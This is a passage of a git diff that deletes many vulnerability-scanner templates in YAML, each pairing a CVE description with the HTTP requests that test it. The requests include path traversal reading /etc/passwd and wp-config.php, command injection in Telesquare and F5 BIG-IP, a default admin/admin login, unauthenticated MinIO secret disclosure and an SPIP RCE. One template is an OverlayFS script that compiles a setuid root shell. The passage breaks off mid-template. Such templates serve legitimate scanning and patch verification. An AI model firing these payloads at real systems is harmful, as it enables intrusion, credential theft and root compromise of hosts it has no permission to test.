.*?)\">".bsubmatch(response.body)'
- cs_token: search["cs_token"]
- r1:
- request:
- method: POST
- path: /login/
- headers:
- Referer: "{{refererUrl}}/admin/airflow/login"
- body: |
- csrf_token={{cs_token}}&username=admin&password=admin
- expression: response.status == 302 && response.body.bcontains(b'Redirecting...') && response.body.bcontains(b'Redirecting...
') && response.body.bcontains(b'') && response.raw_header.bcontains(b'session')
-expression: r0() && r1()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2021-45232.yaml b/tmp/cve/CVE-2021-45232.yaml
deleted file mode 100644
index c63a1f92c8..0000000000
--- a/tmp/cve/CVE-2021-45232.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: CVE-2021-45232
-
-info:
- name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
- author: Mr-xn
- severity: critical
- verified: true
- description: |
- In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
- title="Apache APISIX Dashboard"
- reference:
- - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- - https://github.com/pingpongcult/CVE-2021-45232
- - https://github.com/advisories/GHSA-wcxq-f256-53xp
- - https://twitter.com/403Timeout/status/1475715079173976066
- - https://github.com/wuppp/cve-2021-45232-exp
-
-rules:
- r0:
- request:
- method: GET
- path: /apisix/admin/migrate/export
- expression: response.status == 200 && response.body.bcontains(b'"Consumers":')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2021-46417.yaml b/tmp/cve/CVE-2021-46417.yaml
deleted file mode 100644
index 51101bff62..0000000000
--- a/tmp/cve/CVE-2021-46417.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: CVE-2021-46417
-
-info:
- name: Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞
- author: zan8in
- severity: high
- description: |
- Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件
- "Franklin Fueling Systems"
- reference:
- - http://wiki.peiqi.tech/wiki/webapp/Franklin/Franklin%20Fueling%20Systems%20tsaupload.cgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2021-46417.html
-
-rules:
- r0:
- request:
- method: GET
- path: /cgi-bin/tsaupload.cgi?file_name=../../../../../../etc/passwd&password=
- expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2021-46418.yaml b/tmp/cve/CVE-2021-46418.yaml
deleted file mode 100644
index 5deb66079d..0000000000
--- a/tmp/cve/CVE-2021-46418.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2021-46418
-
-info:
- name: Telesquare TLR-2855KS6 - 任意文件创建
- author: Momen Eldawakhly (Cyber Guy)
- severity: critical
- description: |
- Telesquare TLR-2855KS6 中存在通过 PUT 方法创建未授权文件的漏洞,可允许创建 CGI 脚本。
- fofa-query: product=="TELESQUARE-TLR-2855KS6"
- reference:
- - https://www.exploit-db.com/exploits/50862
- - http://packetstormsecurity.com/files/166674/Telesquare-TLR-2855KS6-Arbitrary-File-Creation.html
- - https://drive.google.com/drive/folders/1avIfk1MZNmNQYePE1_n4irC24daxCeBA
-
-rules:
- r0:
- request:
- method: PUT
- path: /cgi-bin/testing_cve.txt
- headers:
- DNT: 1
- body: |
- File creation via PUT method POC
- expression: response.status == 201
- r1:
- request:
- method: GET
- path: /cgi-bin/testing_cve.txt
- expression: response.status == 200 && response.body.bcontains(b'File creation via PUT method POC')
-expression: r0() && r1()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2021-46419.yaml b/tmp/cve/CVE-2021-46419.yaml
deleted file mode 100644
index 94aab9b7a6..0000000000
--- a/tmp/cve/CVE-2021-46419.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: CVE-2021-46419
-
-info:
- name: Telesquare TLR-2855KS6 - 任意文件删除
- author: Momen Eldawakhly (Cyber Guy)
- severity: critical
- description: |
- Telesquare TLR-2855KS6 中存在通过 PUT 方法创建未授权文件的漏洞,可允许创建 CGI 脚本。
- fofa-query: product=="TELESQUARE-TLR-2855KS6"
- reference:
- - https://www.exploit-db.com/exploits/50863
- - http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.html
- - https://drive.google.com/drive/folders/1TWw3Oy0wZImSHK_hj-tKkbn9sFgqqySp
-
-rules:
- r0:
- request:
- method: DELETE
- path: /cgi-bin/testing_cve.txt
- expression: response.status == 204 && response.headers["server"].icontains("lighttpd")
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2021-46422.yaml b/tmp/cve/CVE-2021-46422.yaml
deleted file mode 100644
index f1dd9b094d..0000000000
--- a/tmp/cve/CVE-2021-46422.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: CVE-2021-46422
-
-info:
- name: Telesquare SDT-CW3B1 admin.cgi 远程命令执行漏洞
- author: zan8in
- severity: critical
- description: |
- Telesquare SDT-CW3B1 1.1.0版本中存在命令注入漏洞,攻击者通过漏洞可以获取服务器权限
- app="SDT-CS3B1"
- reference:
- - http://wiki.peiqi.tech/wiki/iot/Telesquare/Telesquare%20SDT-CW3B1%20admin.cgi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2021-46422.html
-
-rules:
- r0:
- request:
- method: GET
- path: /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
- expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-0448.yaml b/tmp/cve/CVE-2022-0448.yaml
deleted file mode 100644
index 43d0068991..0000000000
--- a/tmp/cve/CVE-2022-0448.yaml
+++ /dev/null
@@ -1,56 +0,0 @@
-id: CVE-2022-0448
-
-info:
- name: "CP Blocks <= 1.0.14 - Authenticated Stored Cross-Site Scripting via License ID settings"
- author: topscoder
- severity: medium
- description: "The CP Blocks WordPress plugin before 1.0.15 does not sanitise and escape its "License ID" settings, which could allow high privilege users to inject arbitrary web scripts that execute in a victim's browser even when the unfiltered_html is disallowed."
- reference:
-
- classification:
- cvss-metrics:
- cvss-score:
- cve-id: CVE-2022-0448
- metadata:
- fofa-query: "wp-content/plugins/cp-blocks/"
- google-query: inurl:"/wp-content/plugins/cp-blocks/"
- shodan-query: 'vuln:CVE-2022-0448'
- tags: cve,wordpress,wp-plugin,cp-blocks,medium
-
-http:
- - method: GET
- redirects: true
- max-redirects: 3
- path:
- - "{{BaseURL}}/wp-content/plugins/cp-blocks/readme.txt"
-
- extractors:
- - type: regex
- name: version
- part: body
- group: 1
- internal: true
- regex:
- - "(?mi)Stable tag: ([0-9.]+)"
-
- - type: regex
- name: version
- part: body
- group: 1
- regex:
- - "(?mi)Stable tag: ([0-9.]+)"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "cp-blocks"
- part: body
-
- - type: dsl
- dsl:
- - compare_versions(version, '<= 1.0.15')
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-0540.yaml b/tmp/cve/CVE-2022-0540.yaml
deleted file mode 100644
index 5b361c4522..0000000000
--- a/tmp/cve/CVE-2022-0540.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2022-0540
-
-info:
- name: Atlassian Jira - Authentication bypass in Seraph
- author: DhiyaneshDK 不动明王
- severity: critical
- verified: true
- description: |
- A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to
- bypass authentication by sending a specially crafted HTTP
- request. This affects Atlassian Jira Server and Data Center versions before 8.13.18,
- versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0.
- This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18,
- versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
-
- fofa "Atlassian Jira"
- fofa title="General"
- reference:
- - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
- - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
- - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
-
-rules:
- r0:
- request:
- method: GET
- path: /InsightPluginShowGeneralConfiguration.jspa;
- expression: response.status == 200 && response.body.bcontains(b'General Insight Configuration')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-0656.yaml b/tmp/cve/CVE-2022-0656.yaml
deleted file mode 100644
index 6ad25889ba..0000000000
--- a/tmp/cve/CVE-2022-0656.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2022-0656
-
-info:
- name: uDraw <3.3.3 - Local File Inclusion
- author: akincibor
- severity: high
- verified: true
- description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action
- (available to both unauthenticated and authenticated users) before using it in the file_get_contents
- function and returning its content base64 encoded in the response. As a result, unauthenticated users could read
- arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
-
- fofa "uDraw"
-
- reference:
- - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151
- - https://nvd.nist.gov/vuln/detail/CVE-2022-0656
-
-rules:
- r0:
- request:
- method: POST
- path: /wp-admin/admin-ajax.php
- headers:
- X-Requested-With: XMLHttpRequest
- body: action=udraw_convert_url_to_base64&url=/etc/passwd
- expression: response.status == 200 && response.body.bcontains(b'cm9vd') && response.body.bcontains(b'data:image\\/;base64')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-0776.yaml b/tmp/cve/CVE-2022-0776.yaml
deleted file mode 100644
index 39746c0077..0000000000
--- a/tmp/cve/CVE-2022-0776.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2022-0776
-
-info:
- name: RevealJS postMessage <4.3.0 - Cross-Site Scripting
- author: LogicalHunter
- severity: high
- description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.
- reference:
- - https://hackerone.com/reports/691977
- - https://github.com/hakimel/reveal.js/pull/3137
- - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/
- - https://nvd.nist.gov/vuln/detail/CVE-2022-0776
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
- cvss-score: 7.2
- cwe-id: CWE-79
- cve-id: CVE-2022-0776
- tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs
-
-headless:
- - steps:
- - args:
- url: "{{BaseURL}}"
- action: navigate
- - action: waitload
- - action: script
- name: extract
- args:
- code: |
- () => {
- return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0")
- }
-
- matchers:
- - type: word
- part: extract
- words:
- - "true"
-
-# Enhanced by mp on 2022/09/14
diff --git a/tmp/cve/CVE-2022-1020.yaml b/tmp/cve/CVE-2022-1020.yaml
deleted file mode 100644
index 494c273389..0000000000
--- a/tmp/cve/CVE-2022-1020.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: CVE-2022-1020
-
-info:
- name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
- author: Akincibor
- severity: critical
- verified: true
- description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option
- AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the
- callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
- fofa title="WordPress WooCommerce "
-
- reference:
- - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
- - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
-
-rules:
- r0:
- request:
- method: POST
- path: /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option
- body: option_key=a&perpose=update&callback=phpinfo
- expression: response.status == 200 && response.body.bcontains(b'PHP Extension')&& response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td>([0-9.]+)'.bmatches(response.body)
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-1119.yaml b/tmp/cve/CVE-2022-1119.yaml
deleted file mode 100644
index 8acd30cfc0..0000000000
--- a/tmp/cve/CVE-2022-1119.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: CVE-2022-1119
-
-info:
- name: WordPress Simple File List <3.2.8 - Local File Inclusion
- author: random-robbie
- severity: high
- description: |
- WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
- reference:
- - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
- - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
- - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
- - https://nvd.nist.gov/vuln/detail/CVE-2022-1119
-
-rules:
- r0:
- request:
- method: GET
- path: /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php
- expression: response.status == 200 && response.body.bcontains(b'DB_NAME') && response.body.bcontains(b'DB_PASSWORD')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-1388.yaml b/tmp/cve/CVE-2022-1388.yaml
deleted file mode 100644
index 7fdb3e52d8..0000000000
--- a/tmp/cve/CVE-2022-1388.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CVE-2022-1388
-
-info:
- info:
- name: F5 BIG-IP iControl REST Auth Bypass RCE
- author: dwisiswant0
- severity: critical
- description: |
- This vulnerability may allow an unauthenticated attacker
- with network access to the BIG-IP system through the management
- port and/or self IP addresses to execute arbitrary system commands,
- create or delete files, or disable services. There is no data plane
- exposure; this is a control plane issue only.
- reference:
- - https://twitter.com/GossiTheDog/status/1523566937414193153
- - https://support.f5.com/csp/article/K23605346
-
-set:
- user: "base64('admin:')"
-rules:
- r0:
- request:
- method: POST
- path: /mgmt/tm/util/bash
- headers:
- Connection: keep-alive, X-F5-Auth-Token
- X-F5-Auth-Token: a
- Authorization: Basic {{user}}
- Content-Type: application/json
- body: |
- {
- "command": "run",
- "utilCmdArgs": "-c id"
- }
- expression: response.status == 200 && response.body.bcontains(b'commandResult') && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-1390.yaml b/tmp/cve/CVE-2022-1390.yaml
deleted file mode 100644
index ecb31d5da2..0000000000
--- a/tmp/cve/CVE-2022-1390.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: CVE-2022-1390
-
-info:
- name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
- author: daffainfo,Splint3r7
- severity: critical
- description: |
- The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
- reference:
- - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- - https://wordpress.org/plugins/admin-word-count-column/
- - https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
- - https://nvd.nist.gov/vuln/detail/CVE-2022-1390
-
-rules:
- r0:
- request:
- method: GET
- path: /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0
- expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-2034.yaml b/tmp/cve/CVE-2022-2034.yaml
deleted file mode 100644
index 87950cbdce..0000000000
--- a/tmp/cve/CVE-2022-2034.yaml
+++ /dev/null
@@ -1,48 +0,0 @@
-id: CVE-2022-2034
-
-info:
- name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
- author: imhunterand
- severity: medium
- description: |
- The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
- reference:
- - https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
- - https://hackerone.com/reports/1590237
- - https://wordpress.org/plugins/sensei-lms/advanced/
- - https://nvd.nist.gov/vuln/detail/CVE-2022-2034
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
- cve-id: CVE-2022-2034
- cwe-id: CWE-862
- metadata:
- verified: "true"
- tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
-
- payloads:
- num: ../../../helpers/wordlists/numbers.txt
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'sensei_message'
- - 'guid":{"rendered":'
- condition: and
-
- - type: word
- part: header
- words:
- - application/json
-
- - type: status
- status:
- - 200
diff --git a/tmp/cve/CVE-2022-21371.yaml b/tmp/cve/CVE-2022-21371.yaml
deleted file mode 100644
index 6f3b5c5243..0000000000
--- a/tmp/cve/CVE-2022-21371.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2022-21371
-
-info:
- name: Oracle WebLogic Server Local File Inclusion
- author: zan8in
- severity: critical
-
-set:
- hostname: request.url.host
-rules:
- r0:
- request:
- raw: |
- GET .//WEB-INF/web.xml HTTP/1.1
- Host: {{hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- expression: response.status == 200 && response.body.bcontains(b'') && (response.raw_header.bcontains(b'application/xml') || response.raw_header.bcontains(b'text/xml'))
- r1:
- request:
- raw: |
- GET .//WEB-INF/weblogic.xml HTTP/1.1
- Host: {{hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- expression: response.status == 200 && response.body.bcontains(b'') && (response.raw_header.bcontains(b'application/xml') || response.raw_header.bcontains(b'text/xml'))
-expression: r0() || r1()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-21661.yaml b/tmp/cve/CVE-2022-21661.yaml
deleted file mode 100644
index bf221a189d..0000000000
--- a/tmp/cve/CVE-2022-21661.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2022-21661
-
-info:
- name: WordPress Core 5.8.2 - 'WP_Query' SQL注入信息泄露漏洞
- author: Aryan Chehreghani
- severity: critical
- description: 此漏洞允许远程攻击者泄露有关受影响的WordPress核心安装的敏感信息,Authentication 不需要利用此漏洞,具体缺陷存在于 WP_Query 类中,该问题是由于在使用用户提供的字符串构建SQL查询之前没有对其进行适当的验证,An attacker 可以利用此漏洞来泄露存储的凭据,从而导致进一步的危害。
- reference:
- - https://wordpress.org/news/category/releases
- - https://www.zerodayinitiative.com/advisories/ZDI-22-020
- - https://hackerone.com/reports/1378209
-
-set:
- rand: randomInt(200000000, 210000000)
-rules:
- r0:
- request:
- method: POST
- path: /wp-admin/admin-ajax.php
- headers:
- Sec-Fetch-Dest: document
- Sec-Fetch-Mode: navigate
- Sec-Fetch-Site: cross-site
- Sec-Fetch-User: ?1
- Cache-Control: max-age=0
- body: |
- action=&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":[""]}}}
- expression: response.status == 200 && response.body.bcontains(b'WordPress database error:')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2022-22242.yaml b/tmp/cve/CVE-2022-22242.yaml
deleted file mode 100644
index 3aa401ddc4..0000000000
--- a/tmp/cve/CVE-2022-22242.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2022-22242
-
-info:
- name: Juniper Networks Junos OS错误页面反射XSS漏洞CVE-2022-22242
- author: daffainfo
- severity: medium
- verified: true
- description: |
- CVE-2022-22242它是位于出错页面 (“error.php”) 上的预认证反射型XSS漏洞,可导致远程攻击者嗅探 Junos OS 管理员会话并与其它要求认证的缺陷组合利用。
- fofa-query: icon_hash="1167011145"
- reference:
- - https://www.linuxlz.com/aqld/3200.html
-
-rules:
- r0:
- request:
- method: GET
- path: /error.php?SERVER_NAME=
- expression: response.body.bcontains(b"
-
- payloads:
- padding: helpers/payloads/citrix_paddings.txt
- threads: 30
- stop-at-first-match: true
- matchers:
- - type: dsl
- dsl:
- - 'body == "ERROR: The method or operation is not implemented."'
- - 'status_code == 200'
- condition: and
-
- extractors:
- - type: dsl
- dsl:
- - 'BaseURL+ "/cifs/" + fileName + ".aspx"'
-
-# digest: 4b0a00483046022100e236a9b49ee30bab3b2efc4e653342c4f50757e5ce98849d1c619882bfb3c7db022100e17cf1c5daba19376870bd85b85d8ca53fa0cbebf28e13dcf0b109ad9fe5a2aa:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/cve/CVE-2023-26256.yaml b/tmp/cve/CVE-2023-26256.yaml
deleted file mode 100644
index a97b37ea8a..0000000000
--- a/tmp/cve/CVE-2023-26256.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: CVE-2023-26256
-
-info:
- name: STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion
- author: pikpikcu
- severity: high
- verified: false
- description: |
- STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.
- shodan-query: title:Jira
- reference:
- - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md
- - https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
- - https://nvd.nist.gov/vuln/detail/CVE-2023-26256
-
- rules:
- r0:
- request:
- method: GET
- path: /plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
- expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) && response.raw_header.bcontains(b'$textMime')
- expression: r0()
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-2640.yaml b/tmp/cve/CVE-2023-2640.yaml
deleted file mode 100644
index ea23ad4579..0000000000
--- a/tmp/cve/CVE-2023-2640.yaml
+++ /dev/null
@@ -1,57 +0,0 @@
-id: CVE-2023-2640
-
-info:
- name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
- author: princechaddha
- severity: high
- description: |
- A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
- impact: |
- An attacker with local access can gain elevated privileges on the affected system.
- remediation: |
- Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
- reference:
- - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640
- - https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
- - https://ubuntu.com/security/notices/USN-6250-1
- - https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-2640
- cwe-id: CWE-863
- epss-score: 0.00174
- epss-percentile: 0.53697
- cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
- metadata:
- verified: true
- max-request: 2
- vendor: canonical
- product: ubuntu_linux
- tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical
-
-self-contained: true
-code:
- - engine:
- - sh
- - bash
- source: |
- id
-
- - engine:
- - sh
- - bash
- source: |
- cd /tmp
- echo '#include \n#include \n#include \n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
- gcc test.c -o test
- unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
-
- matchers:
- - type: dsl
- dsl:
- - '!contains(code_1_response, "(root)")'
- - 'contains(code_2_response, "(root)")'
- condition: and
-# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-27372.yaml b/tmp/cve/CVE-2023-27372.yaml
deleted file mode 100644
index 84aa0f9b28..0000000000
--- a/tmp/cve/CVE-2023-27372.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: spip-rce-cve-2023-27372
-
-info:
- name: SPIP RCE CVE-2023-27372
- author: SirBugs
- severity: high
- reference: https://example.com/reference
- tags: spip,rce,cve-2023-27372
-
-raw:
- - |
- POST /spip.php?page=spip_pass HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 162
-
- page=spip_pass&formulaire_action=oubli&formulaire_action_args=E1nK0hfOPllDtCUbG6L94SlEpZi7Vz17IKUbf0ZB6ET0WbEHeXrw9tNNCEWjm0ac0%2F4DuboKIZvygjRh&oubli=s:19:"";&nobot=
-
- matchers:
- - type: word
- words:
- - "Configuration File (php.ini) Path"
- part: body
diff --git a/tmp/cve/CVE-2023-28432.yaml b/tmp/cve/CVE-2023-28432.yaml
deleted file mode 100644
index 9f026bbf0a..0000000000
--- a/tmp/cve/CVE-2023-28432.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: CVE-2023-28432
-
-info:
- name: MinIO 未授权信息泄露
- author: zan8in
- severity: high
- verified: true
- expression: |
- Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
- fofa: app="minio" && port=9000
-
-set:
- hostname: request.url.host
-rules:
- r0:
- request:
- raw: |
- POST /minio/bootstrap/v1/verify HTTP/1.1
- Host: {{hostname}}
- Content-Type: application/x-www-form-urlencoded
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- expression: response.status == 200 && response.body.bcontains(b'"MINIO_KMS_SECRET_KEY":') && response.body.bcontains(b'"MINIO_ROOT_PASSWORD":') && response.body.bcontains(b'"MINIO_ROOT_USER":')
- r1:
- request:
- raw: |
- POST /minio/bootstrap/v1/verify HTTP/1.1
- Host: {{hostname}}
- Content-Type: application/json
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- expression: response.status == 200 && response.body.bcontains(b'"MINIO_KMS_SECRET_KEY":') && response.body.bcontains(b'"MINIO_ROOT_PASSWORD":') && response.body.bcontains(b'"MINIO_ROOT_USER":')
- r2:
- request:
- method: POST
- path: /minio/bootstrap/v1/verify
- headers:
- Content-Type: application/x-www-form-urlencoded
- expression: response.status == 200 && response.body.bcontains(b'"MINIO_KMS_SECRET_KEY":') && response.body.bcontains(b'"MINIO_ROOT_PASSWORD":') && response.body.bcontains(b'"MINIO_ROOT_USER":')
- r3:
- request:
- method: POST
- path: /minio/bootstrap/v1/verify
- headers:
- Content-Type: application/json
- expression: response.status == 200 && response.body.bcontains(b'"MINIO_KMS_SECRET_KEY":') && response.body.bcontains(b'"MINIO_ROOT_PASSWORD":') && response.body.bcontains(b'"MINIO_ROOT_USER":')
-expression: r0() || r1() || r2() || r3()
diff --git a/tmp/cve/CVE-2023-32629.yaml b/tmp/cve/CVE-2023-32629.yaml
deleted file mode 100644
index bde55fb57f..0000000000
--- a/tmp/cve/CVE-2023-32629.yaml
+++ /dev/null
@@ -1,53 +0,0 @@
-id: CVE-2023-32629
-
-info:
- name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
- author: princechaddha
- severity: high
- description: |
- A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
- reference:
- - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32629
- - https://lists.ubuntu.com/archives/kernel-team/2023-July/140920.html
- - https://ubuntu.com/security/notices/USN-6250-1
- remediation: |
- Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
